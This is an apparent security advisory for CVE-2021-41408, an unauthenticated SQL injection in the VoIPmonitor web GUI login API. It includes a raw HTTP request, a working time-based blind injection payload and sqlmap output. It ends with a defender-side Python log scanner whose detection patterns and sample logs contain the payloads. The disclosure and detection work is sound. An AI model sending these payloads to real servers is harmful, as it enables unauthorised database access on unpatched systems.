CVE-2021-41408: voipmonitor unauth sql injection
VoIPmonitor WEB GUI up to version 24.61 is affected by SQL injection through the "api.php" file and the "user" parameter.
The injection is in the user parameter of the login action. Since api.php does not require any authentication, an attacker can exploit this vulnerability without a valid session or credentials.
GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close
sqlmap result:
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj'='jvDj&pass=trollz
---
[02:19:33] [INFO] testing MySQL
[02:20:22] [INFO] confirming MySQL
web application technology: Nginx 1.14.2, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.3.29-MariaDB-1:10.3.29+maria~stretch'
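As an added defender-side example (not part of this advisory and not voipmonitor code): a Python scan over constructed nginx access-log lines that flags requests to the unauthenticated api.php login action whose user parameter carries the quote-breaking boolean/time-based patterns seen in the sqlmap payload above, or that took 5 seconds or longer to serve. It assumes nginx's log_format has been extended with $request_time as a trailing field; the log lines and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# nginx "combined" format plus an assumed trailing $request_time field.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"(?: (?P<rt>[\d.]+))?'
)
# Indicators modelled on the advisory's payload: a quote followed by AND/OR,
# SLEEP()/BENCHMARK() delays, UNION SELECT, or comment openers. Not exhaustive.
SQLI_RE = re.compile(r"""['"]\s*(AND|OR)\b|SLEEP\s*\(|BENCHMARK\s*\(|UNION\s+SELECT|--|/\*""", re.I)
SLOW_SECONDS = 5.0  # matches the SLEEP(5) used in the time-based probe

def check_line(line):
    """Return a finding dict for a suspicious api.php login request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/api.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if params.get("action", [""])[0] != "login":
        return None
    user = params.get("user", [""])[0]
    hit = SQLI_RE.search(user)
    slow = m.group("rt") is not None and float(m.group("rt")) >= SLOW_SECONDS
    if not hit and not slow:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "user": user,
            "pattern": hit.group(0) if hit else None, "slow": slow,
            "status": int(m.group("status"))}

def scan(lines):
    """Run check_line over every line and keep only the findings."""
    return [f for f in (check_line(l) for l in lines) if f]

# Constructed sample log: one time-based probe, one benign login, one unrelated
# request, and one boolean-style injection attempt.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2021:02:19:33 +0000] "GET /voipmonitorpath/api.php?action=login&user=%27%20AND%20%28SELECT%209158%20FROM%20%28SELECT%28SLEEP%285%29%29%29Evax%29%20AND%20%27jvDj%27%3D%27jvDj&pass=trollz HTTP/1.1" 200 47 "-" "Mozilla/5.0" 5.012',
    '198.51.100.7 - - [10/Sep/2021:02:20:01 +0000] "GET /voipmonitorpath/api.php?action=login&user=alice&pass=secret HTTP/1.1" 200 47 "-" "Mozilla/5.0" 0.031',
    '198.51.100.7 - - [10/Sep/2021:02:20:05 +0000] "GET /voipmonitorpath/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0" 0.004',
    '203.0.113.5 - - [10/Sep/2021:02:20:22 +0000] "GET /voipmonitorpath/api.php?action=login&user=bob%27%20OR%20%271%27%3D%271&pass=x HTTP/1.1" 200 47 "-" "Mozilla/5.0" 0.040',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because api.php needs no session, every flagged line is reachable by anyone who can reach the web GUI, so findings here are worth correlating by source address rather than by user.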
cc: @cnbrkbolat & @R0h1rr1m